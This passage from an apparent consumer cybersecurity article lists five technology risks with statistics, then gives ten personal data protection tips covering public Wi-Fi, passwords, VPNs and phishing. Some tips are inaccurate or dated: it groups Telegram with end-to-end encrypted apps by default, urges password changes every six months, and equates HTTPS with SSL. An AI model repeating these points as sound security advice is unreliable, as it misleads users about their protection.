  6. Online Fraud: Technology-based schemes used by scammers to defraud individuals through financial transactions or disclosing personal information. This leads to substantial financial losses, with consumers reporting nearly $8.8 billion lost due to scams and frauds in 2022, per the Federal Trade Commission (FTC).

  7. Unauthorized Access to Personal Information: Intrusion by hackers accessing sensitive personal data stored online without permission, potentially causing privacy breaches and identity theft. Amnesty International’s recent survey shows 73% advocate stricter government regulations on major tech companies, with 71% concerned about their personal data collection and usage.

  8. Technology Addiction:Excessive tech use leading to dependency, negatively impacting daily life and social interactions, potentially causing social isolation and mental health issues. Statista reports global internet users spend an average of two hours and 27 minutes daily on social platforms.

  9. Fake News and Misinformation: Misleading or false information dissemination online, manipulating public opinion and undermining trust in reliable sources. In 2022, Statista noted the coronavirus as the most common theme for spreading fake news, affecting about 50% of respondents.

  10. Online Piracy: Illegal sharing and downloading of copyrighted material, such as movies, music, and software, undermining content creators’ rights and potentially harming the entertainment industry. MUSO’s study reports over a 20% increase in visits to illegal site pages within a year.

Examining these ten examples of technological risks provides a comprehensive view of the inherent dangers of technology misuse in today’s society. Understanding and addressing these risks are crucial for fostering a safer and more protected digital environment.

How to protect your personal data?

Nowadays, most people are working from home and their computers. This elevates their risk when encountered with possible cyberattacks. For example, the simple fact of connecting to the public WiFi when going to work in a café or co-working space could expose us to a hack that could compromise the sensitive information on our computers.

If you are still not very clear about what cybersecurity is and how personal data protection works, we have developed the main points you should know about these issues throughout this article.

Download the complete recommendations here

1. Avoid connecting to Public WIFI Networks

While many establishments offer free Wi-Fi, we don’t know what security measures they have in place. To protect your data, do not trust public networks and if you are forced to use them, avoid making transactions or shopping online, as well as work activities.

2. Manage your passwords

We know that sometimes it is difficult to remember your usernames and passwords for the different platforms you use, but by allowing your browser to memorize them, you could be putting your data at risk. We recommend using a password manager platform, so you no longer have to memorize them.

3. Choose strong passwords

A strong password will prevent the theft of your data. Don’t use the same password for every account; avoid choosing birth dates, anniversaries, or names of loved ones. A strong password should be at least 12 characters long and include uppercase and lowercase letters, symbols, and numbers. We recommend changing your passwords at least every six months.

4. Use the internet safely

Before entering your information or downloading any file, verify that the URL begins with HTTPS. This means that it has the Secure Sockets Layer (SSL) protocol, this protocol indicates that the data you share will travel over an encrypted channel.

5. Keep your devices updated

Remember that updates fix cybersecurity flaws in previous versions therefore, it’s important that you install all  systems’ or programs’ updates on your devices.

6. Be careful with the instant messaging apps you use

We know that instant messaging applications are our primary means of communication. However, it is important that the messages you send are encrypted, so that, even if someone could intercept them, they would not be able to understand them. To protect your data, use apps that offer end to end encryption, such as Telegram, Signal, or Wire

7. Use different devices for work and personal data

It is best to keep personal and professional data and devices separate. Avoid using your computer or any other work device for personal matters.

8. Use a Virtual Private Network (VPN)

To protect your data, it is advisable to use a Virtual Private Network (VPN) on all your devices. This way you can connect to the internet through this network instead of connecting directly to your modem or router.

9. Do not store personal data on your devices or browser

When you’re done using your browser, we recommend that you make sure to log out and clear your browser’s cache and browsing history. This decreases the chance of others accessing your data.

10. Be aware of phishing campaigns

Phishing is a social engineering attack, through which emails or messages are sent with elements to make them look legit and obtain our data, such as name, card numbers, or passwords. We recommend you check the elements that make up the email, do not download any files, or click on links that look suspicious.

Download the complete recommendations here